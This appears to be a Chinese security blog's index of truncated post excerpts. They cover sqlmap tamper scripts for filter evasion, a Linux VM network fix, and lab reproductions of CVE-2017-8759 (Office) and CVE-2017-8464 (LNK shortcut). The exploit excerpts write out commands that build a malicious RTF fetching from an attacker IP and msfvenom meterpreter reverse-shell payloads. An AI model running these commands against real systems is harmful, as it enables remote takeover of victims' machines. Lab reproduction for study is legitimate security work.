01. apostrophemask.py 用UTF-8全角字符替换单引号字符
02. apostrophenullencode.py 用非法双字节unicode字符替换单引号字符
03. appendnullbyte.py 在payload末尾添加空字符编码
04. base64encode.py 对给定的payload全部字符使用Base64编码
05. between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”
06. bluecoat.py 在SQL语句之后用有效的随机空白符替换空格符,随后[……]
linux虚拟机网络配置
service network restart
弹出界面eth0:错误:没有找到合适的设备:没有找到可用于连接’System eth0′ 的设备
ifconfig 发现eth0网卡不存在
可能原因:
复制或者克隆虚拟机时未修改mac地址
修改方法:
1、vi /etc/udev/rules.d/70-persistent-net.rules 删掉eth0 网卡信息,把eth1改为eth0,并复制mac地址 2、vi /etc/sysconfig/network-scripts/ifctf-eth0 修改mac为刚才复制的 如果虚拟机nat方式联网需要[......]
CVE-2017-8759 offcie代码执行漏洞复现
攻击机:192.168.0.109,kali 靶机:192.168.0.120 ,win7,office 2010 exp: CVE-2017-8759-masterPython version 2.7.13
一、生成恶意rtf或者ppsx文件
python cve-2017-8759_toolkit.py -M gen -w 12.rtf -u http:// 192.168.0.109/logo.txt
二、生成反弹shell的exp文件
还在解压目录执行
32位执行:
msfvenom -p windows/meterpreter/reverse_tcp LHOST[......]
CVE-2017-8464快捷方式代码执行复现
给你一个快捷方式,你双击了,你就被可黑了。
关于漏洞的复现,github有py脚本:(本次实验不需要)
https://github.com/nixawk/labs/tree/master/CVE-2017-8464
攻击机:kali 192.168.0.111
第一步,创建metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.111 LPORT=1337 -f psh-reflection > xx.ps1
第二步,将payload放置在web上
[……]

